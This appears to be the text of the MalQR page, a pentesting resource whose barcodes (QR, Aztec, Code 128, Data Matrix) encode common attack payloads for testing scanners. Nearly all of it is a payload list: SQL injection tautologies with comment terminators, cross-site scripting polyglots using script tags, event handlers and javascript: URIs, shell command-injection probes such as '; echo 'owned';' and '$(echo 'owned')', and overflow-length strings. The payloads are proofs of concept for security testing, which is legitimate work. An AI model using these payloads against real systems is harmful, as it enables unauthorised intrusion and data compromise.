MalQR

MalQR is a collection of malicious QR Codes & Barcodes you can use to test the security of your scanners.

It gives you the ability to conduct such tests with easiness: you just need to have a smartphone, a tablet or a laptop with internet connection and browse MalQR.shielder.it to have a large collection of common payloads.
MalQR is useful for lazy pentesters who just want to hack and don't waste time to regenerate each time those common payloads or remember to bring them on field during assessments.

QR codes


'or'x'='x

'or'x'='x

'or'x'='x'-- -

'or'x'='x'-- -

'or'x'='x'/*

'or'x'='x'/*

'or'x'='x'//

'or'x'='x'//

'and'x'='x

'and'x'='x

'and'x'='x'-- -

'and'x'='x'-- -

'and'x'='x'/*

'and'x'='x'/*

'and'x'='x'//

'and'x'='x'//

or 1=1

or 1=1

or 1=1-- -

or 1=1-- -

or 1=1/*

or 1=1/*

or 1=1//

or 1=1//

and 1=1

and 1=1

and 1=1-- -

and 1=1-- -

and 1=1/*

and 1=1/*

and 1=1//

and 1=1//

'||'x'='x

'||'x'='x

'||'x'='x'-- -

'||'x'='x'-- -

'||'x'='x'/*

'||'x'='x'/*

'||'x'='x'//

'||'x'='x'//

'&&'x'='x

'&&'x'='x

'&&'x'='x'-- -

'&&'x'='x'-- -

'&&'x'='x'/*

'&&'x'='x'/*

'&&'x'='x'//

'&&'x'='x'//

|| 1=1

|| 1=1

|| 1=1-- -

|| 1=1-- -

|| 1=1/*

|| 1=1/*

|| 1=1//

|| 1=1//

&& 1=1

&& 1=1

&& 1=1-- -

&& 1=1-- -

&& 1=1/*

&& 1=1/*

&& 1=1//

&& 1=1//

<script>alert(1...

<script>alert(1)</script>

"><script>alert...

"><script>alert(1)</script>

<img/src=c/oner...

<img/src=c/onerror=alert(1)>

<svg/onload=ale...

<svg/onload=alert(1)>

javascript://'/...

javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*

javascript://--...

javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a

javascript://</...

javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/

javascript://</...

javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*

javascript://'/...

javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*

javascript://</...

javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//

javascript:aler...

javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*

--></script></t...

--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*

/</title/'/</st...

/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*

javascript://--...

javascript://--></title></style></textarea></script><svg "//' onclick=alert()//

/</title/'/</st...

/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*

';alert(String....

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

“ onclick=ale...

“ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//

'">><marquee><i...

'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg">

javascript://'/...

javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*

javascript://--...

javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a

javascript://</...

javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/

javascript://</...

javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*

javascript://'/...

javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*

javascript://</...

javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//

javascript:aler...

javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*

--></script></t...

--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*

/</title/'/</st...

/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*

javascript://--...

javascript://--></title></style></textarea></script><svg "//' onclick=alert()//

/</title/'/</st...

/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*

&& echo 'owned'...

&& echo 'owned' &&

; echo 'owned';

; echo 'owned';

$(echo 'owned')

$(echo 'owned')

`echo 'owned'`

`echo 'owned'`

| echo 'owned'

| echo 'owned'

"'`\

"'`\

A*32

A*32

A*64

A*64

A*128

A*128

A*256

A*256

A*512

A*512

A*1024

A*1024

A*2048

A*2048

A*2953

A*2953

Aztec codes


'or'x'='x

'or'x'='x

'or'x'='x'-- -

'or'x'='x'-- -

'or'x'='x'/*

'or'x'='x'/*

'or'x'='x'//

'or'x'='x'//

'and'x'='x

'and'x'='x

'and'x'='x'-- -

'and'x'='x'-- -

'and'x'='x'/*

'and'x'='x'/*

'and'x'='x'//

'and'x'='x'//

or 1=1

or 1=1

or 1=1-- -

or 1=1-- -

or 1=1/*

or 1=1/*

or 1=1//

or 1=1//

and 1=1

and 1=1

and 1=1-- -

and 1=1-- -

and 1=1/*

and 1=1/*

and 1=1//

and 1=1//

'||'x'='x

'||'x'='x

'||'x'='x'-- -

'||'x'='x'-- -

'||'x'='x'/*

'||'x'='x'/*

'||'x'='x'//

'||'x'='x'//

'&&'x'='x

'&&'x'='x

'&&'x'='x'-- -

'&&'x'='x'-- -

'&&'x'='x'/*

'&&'x'='x'/*

'&&'x'='x'//

'&&'x'='x'//

|| 1=1

|| 1=1

|| 1=1-- -

|| 1=1-- -

|| 1=1/*

|| 1=1/*

|| 1=1//

|| 1=1//

&& 1=1

&& 1=1

&& 1=1-- -

&& 1=1-- -

&& 1=1/*

&& 1=1/*

&& 1=1//

&& 1=1//

<script>alert(1...

<script>alert(1)</script>

"><script>alert...

"><script>alert(1)</script>

<img/src=c/oner...

<img/src=c/onerror=alert(1)>

<svg/onload=ale...

<svg/onload=alert(1)>

&& echo 'owned'...

&& echo 'owned' &&

; echo 'owned';

; echo 'owned';

$(echo 'owned')

$(echo 'owned')

`echo 'owned'`

`echo 'owned'`

| echo 'owned'

| echo 'owned'

"'`\

"'`\

A*32

A*32

A*64

A*64

A*128

A*128

Code 128


'or'x'='x

'or'x'='x

'or'x'='x'-- -

'or'x'='x'-- -

'or'x'='x'/*

'or'x'='x'/*

'or'x'='x'//

'or'x'='x'//

'and'x'='x

'and'x'='x

'and'x'='x'-- -

'and'x'='x'-- -

'and'x'='x'/*

'and'x'='x'/*

'and'x'='x'//

'and'x'='x'//

or 1=1

or 1=1

or 1=1-- -

or 1=1-- -

or 1=1/*

or 1=1/*

or 1=1//

or 1=1//

and 1=1

and 1=1

and 1=1-- -

and 1=1-- -

and 1=1/*

and 1=1/*

and 1=1//

and 1=1//

'||'x'='x

'||'x'='x

'||'x'='x'-- -

'||'x'='x'-- -

'||'x'='x'/*

'||'x'='x'/*

'||'x'='x'//

'||'x'='x'//

'&&'x'='x

'&&'x'='x

'&&'x'='x'-- -

'&&'x'='x'-- -

'&&'x'='x'/*

'&&'x'='x'/*

'&&'x'='x'//

'&&'x'='x'//

|| 1=1

|| 1=1

|| 1=1-- -

|| 1=1-- -

|| 1=1/*

|| 1=1/*

|| 1=1//

|| 1=1//

&& 1=1

&& 1=1

&& 1=1-- -

&& 1=1-- -

&& 1=1/*

&& 1=1/*

&& 1=1//

&& 1=1//

<script>alert(1...

<script>alert(1)</script>

"><script>alert...

"><script>alert(1)</script>

<img/src=c/oner...

<img/src=c/onerror=alert(1)>

<svg/onload=ale...

<svg/onload=alert(1)>

--></script></t...

--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*

/</title/'/</st...

/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*

javascript://--...

javascript://--></title></style></textarea></script><svg "//' onclick=alert()//

/</title/'/</st...

/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*

--></script></t...

--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*

/</title/'/</st...

/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*

javascript://--...

javascript://--></title></style></textarea></script><svg "//' onclick=alert()//

/</title/'/</st...

/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*

&& echo 'owned'...

&& echo 'owned' &&

; echo 'owned';

; echo 'owned';

$(echo 'owned')

$(echo 'owned')

`echo 'owned'`

`echo 'owned'`

| echo 'owned'

| echo 'owned'

"'`\

"'`\

A*32

A*32

A*64

A*64

A*128

A*128

Data Matrix


'or'x'='x

'or'x'='x

'or'x'='x'-- -

'or'x'='x'-- -

'or'x'='x'/*

'or'x'='x'/*

'or'x'='x'//

'or'x'='x'//

'and'x'='x

'and'x'='x

'and'x'='x'-- -

'and'x'='x'-- -

'and'x'='x'/*

'and'x'='x'/*

'and'x'='x'//

'and'x'='x'//

or 1=1

or 1=1

or 1=1-- -

or 1=1-- -

or 1=1/*

or 1=1/*

or 1=1//

or 1=1//

and 1=1

and 1=1

and 1=1-- -

and 1=1-- -

and 1=1/*

and 1=1/*

and 1=1//

and 1=1//

'||'x'='x

'||'x'='x

'||'x'='x'-- -

'||'x'='x'-- -

'||'x'='x'/*

'||'x'='x'/*

'||'x'='x'//

'||'x'='x'//

'&&'x'='x

'&&'x'='x

'&&'x'='x'-- -

'&&'x'='x'-- -

'&&'x'='x'/*

'&&'x'='x'/*

'&&'x'='x'//

'&&'x'='x'//

|| 1=1

|| 1=1

|| 1=1-- -

|| 1=1-- -

|| 1=1/*

|| 1=1/*

|| 1=1//

|| 1=1//

&& 1=1

&& 1=1

&& 1=1-- -

&& 1=1-- -

&& 1=1/*

&& 1=1/*

&& 1=1//

&& 1=1//

<script>alert(1...

<script>alert(1)</script>

"><script>alert...

"><script>alert(1)</script>

<img/src=c/oner...

<img/src=c/onerror=alert(1)>

<svg/onload=ale...

<svg/onload=alert(1)>

javascript://'/...

javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*

javascript://--...

javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a

javascript://</...

javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/

javascript://</...

javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*

javascript://'/...

javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*

javascript://</...

javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//

javascript:aler...

javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*

--></script></t...

--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*

/</title/'/</st...

/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*

javascript://--...

javascript://--></title></style></textarea></script><svg "//' onclick=alert()//

/</title/'/</st...

/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*

';alert(String....

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

“ onclick=ale...

“ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//

'">><marquee><i...

'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg">

javascript://'/...

javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*

javascript://--...

javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a

javascript://</...

javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/

javascript://</...

javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*

javascript://'/...

javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*

javascript://</...

javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//

javascript:aler...

javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*

--></script></t...

--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*

/</title/'/</st...

/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*

javascript://--...

javascript://--></title></style></textarea></script><svg "//' onclick=alert()//

/</title/'/</st...

/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*

&& echo 'owned'...

&& echo 'owned' &&

; echo 'owned';

; echo 'owned';

$(echo 'owned')

$(echo 'owned')

`echo 'owned'`

`echo 'owned'`

| echo 'owned'

| echo 'owned'

"'`\

"'`\

A*32

A*32

A*64

A*64

A*128

A*128

A*256

A*256

A*512

A*512

A*1024

A*1024